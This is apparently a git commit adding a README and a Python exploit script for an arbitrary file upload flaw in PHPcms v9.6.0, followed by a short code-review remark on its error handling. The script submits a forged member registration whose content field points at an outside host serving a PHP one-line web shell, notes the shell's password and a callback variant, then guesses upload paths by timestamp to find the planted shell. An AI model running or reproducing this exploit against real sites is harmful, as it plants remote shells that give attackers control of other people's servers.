phpcmsv9.6.0
This commit is contained in:
parent
bceb2c4bf8
commit
3827771990
1
CMS/PHPcms/v9.6.0/README.md
Normal file
1
CMS/PHPcms/v9.6.0/README.md
Normal file
@ -0,0 +1 @@
|
|||||||
|
PHPcms v9.6.0 任意文件上传 可直接Getshell
|
59
CMS/PHPcms/v9.6.0/php_v9.6.0_getshell.py
Normal file
59
CMS/PHPcms/v9.6.0/php_v9.6.0_getshell.py
Normal file
@ -0,0 +1,59 @@
|
|||||||
|
# -*- coding:utf-8 -*-
|
||||||
|
import requests
|
||||||
|
import sys
|
||||||
|
from datetime import datetime
|
||||||
|
def getTime():
|
||||||
|
year = str(datetime.now().year)
|
||||||
|
month = "%02d" % datetime.now().month
|
||||||
|
day = "%02d" % datetime.now().day
|
||||||
|
hour = datetime.now().hour
|
||||||
|
hour = hour - 12 if hour > 12 else hour
|
||||||
|
hour = "%02d" % hour
|
||||||
|
minute = "%02d" % datetime.now().minute
|
||||||
|
second = "%02d" % datetime.now().second
|
||||||
|
microsecond = "%06d" % datetime.now().microsecond
|
||||||
|
microsecond = microsecond[:3]
|
||||||
|
nowTime = year + month + day + hour + minute + second + microsecond
|
||||||
|
return int(nowTime), year + "/" + month + day + "/"
|
||||||
|
def main():
|
||||||
|
if len(sys.argv) < 2:
|
||||||
|
print("[*]Usage : Python 1.py http://xxx.com")
|
||||||
|
sys.exit()
|
||||||
|
host = sys.argv[1]
|
||||||
|
url = host + "/index.php?m=member&c=index&a=register&siteid=1"
|
||||||
|
data = {
|
||||||
|
"siteid": "1",
|
||||||
|
"modelid": "1",
|
||||||
|
"username": "dsakkfaffdssdudi",
|
||||||
|
"password": "123456",
|
||||||
|
"email": "dsakkfddsjdi@qq.com",
|
||||||
|
# 如果想使用回调的可以使用http://file.codecat.one/oneword.txt,一句话地址为.php后面加上e=YXNzZXJ0
|
||||||
|
"info[content]": "<img src=http://file.codecat.one/normalOneWord.txt?.php#.jpg>", #密码 akkuman
|
||||||
|
"dosubmit": "1",
|
||||||
|
"protocol": "",
|
||||||
|
}
|
||||||
|
try:
|
||||||
|
startTime, _ = getTime()
|
||||||
|
htmlContent = requests.post(url, data=data)
|
||||||
|
finishTime, dateUrl = getTime()
|
||||||
|
if "MySQL Error" in htmlContent.text and "http" in htmlContent.text:
|
||||||
|
successUrl = htmlContent.text[htmlContent.text.index("http"):htmlContent.text.index(".php")] + ".php"
|
||||||
|
print("[*]Shell : %s" % successUrl)
|
||||||
|
else:
|
||||||
|
print("[-]Notice : writing remoteShell successfully, but failing to get the echo. You can wait the program crawl the uploadfile(in 1-3 second),or re-run the program after modifying value of username and email.\n")
|
||||||
|
successUrl = ""
|
||||||
|
for t in range(startTime, finishTime):
|
||||||
|
checkUrlHtml = requests.get(
|
||||||
|
host + "/uploadfile/" + dateUrl + str(t) + ".php")
|
||||||
|
if checkUrlHtml.status_code == 200:
|
||||||
|
successUrl = host + "/uploadfile/" + \
|
||||||
|
dateUrl + str(t) + ".php"
|
||||||
|
print("[*]Shell : %s" % successUrl)
|
||||||
|
break
|
||||||
|
if successUrl == "":
|
||||||
|
print(
|
||||||
|
"[x]Failed : had crawled all possible url, but i can't find out it. So it's failed.\n")
|
||||||
|
except:
|
||||||
|
print("Request Error")
|
||||||
|
if __name__ == '__main__':
|
||||||
|
main()
|
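Review bot: The bare `except:` at the end of main() turns every failure, including KeyboardInterrupt and a ValueError from the `.index(".php")` slice on the response text, into the same "Request Error" line with no traceback, so a user cannot tell a connection problem from a bug in the script. Narrowing it and showing the cause, `except requests.RequestException as exc:` followed by `print("Request Error: %s" % exc)`, keeps the best-effort behaviour while leaving interrupts and real errors visible. Since the try body also wraps the response parsing and the crawl loop, anything kept under one handler should at least name the exception in the message.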